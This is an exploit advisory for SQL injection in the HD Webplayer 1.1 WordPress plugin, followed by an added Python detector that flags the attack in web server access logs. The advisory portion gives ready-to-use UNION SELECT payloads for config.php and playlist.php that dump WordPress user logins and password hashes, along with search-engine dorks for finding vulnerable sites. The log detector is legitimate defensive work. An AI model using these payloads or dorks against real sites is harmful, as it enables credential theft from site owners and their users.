Title: Wordpress HD Webplayer 1.1 SQL Injection
Author: JoinSe7en
Vendor homepage: http://www.hdwebplayer.com/
Software link: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip
Affected version: 1.1
Tested on: Windows 7, Backtrack 5 r3
+----------------------------------------------------------------------+
| Flaw 1 - config.php                                                  |
+----------------------------------------------------------------------+
# Location:
http://www.2cto.com/wp-content/plugins/hd-webplayer/config.php?id=[INJECT HERE]
# Exploit Code:
config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different
+----------------------------------------------------------------------+
| Flaw 2 - playlist.php                                                |
+----------------------------------------------------------------------+
# Location:
http://www.2cto.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=[INJECT HERE]
# Exploit Code:
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different
Three different search dorks:
# Dork 1 (config.php) inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php) inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General): inurl:"/wp-content/plugins/hd-webplayer/"
Fix: targeted filtering of the injected parameters (`id` in config.php, `videoid` in playlist.php).
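For sites that cannot patch immediately, the two endpoints above are easy to watch in the web server access log: both take a single numeric record id, so any request whose `id` or `videoid` value is not a plain integer is suspect, and the `/*!UNION*/` trick has to be unwrapped before keyword matching works. The following detector is an added example, not code from the advisory or the plugin; the log lines it scans are constructed (the advisory's own payloads, one of them percent-encoded), and the combined-log regex and the `PLUGIN_PARAMS` map are assumptions about the deployment.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Plugin endpoints named in the advisory and the parameter each one injects through (assumed scope).
PLUGIN_PARAMS = {
    "/wp-content/plugins/hd-webplayer/config.php": "id",
    "/wp-content/plugins/hd-webplayer/playlist.php": "videoid",
}
KEYWORDS = ("union", "select", "group_concat", "wp_users")
# Combined access-log format (assumed): client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# MySQL versioned comments such as /*!UNION*/ or /*!50000UNION*/: the server still executes the body.
MYSQL_VERSIONED = re.compile(r"/\*!\d*\s*(.*?)\*/", re.DOTALL)

def normalize(value):
    """Undo (double) URL encoding and unwrap versioned comments so the keywords become visible."""
    for _ in range(2):
        value = unquote_plus(value)
    return MYSQL_VERSIONED.sub(r" \1 ", value)

def classify(line):
    """Return None for a benign line, or a dict describing why the request was flagged."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    param = PLUGIN_PARAMS.get(parts.path)
    if param is None:
        return None  # only the two plugin endpoints are in scope
    for raw in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        value = normalize(raw)
        if value.strip().isdigit():
            continue  # both endpoints only ever expect a numeric record id
        hits = [k for k in KEYWORDS if k in value.lower()]
        return {"ip": m.group("ip"), "path": parts.path, "param": param, "value": value, "hits": hits}
    return None

def scan(lines):
    """Run classify over an iterable of log lines and keep only the flagged requests."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (not real traffic): a benign request, the advisory's config.php
# payload as-is, and its playlist.php payload percent-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /wp-content/plugins/hd-webplayer/config.php?id=7 HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Oct/2012:13:56:01 +0000] "GET /wp-content/plugins/hd-webplayer/config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Oct/2012:13:56:14 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=1%2B%2F%2A%21UNION%2A%2F%2B%2F%2A%21SELECT%2A%2F%2Bgroup_concat%28ID%29%2Bfrom%2Bwp_users HTTP/1.1" 200 1024',
]
```

`scan(SAMPLE_LOG)` returns the two flagged requests with the unwrapped `UNION ... SELECT` text and the matched keywords; feeding it `sys.stdin` works the same way on a live log.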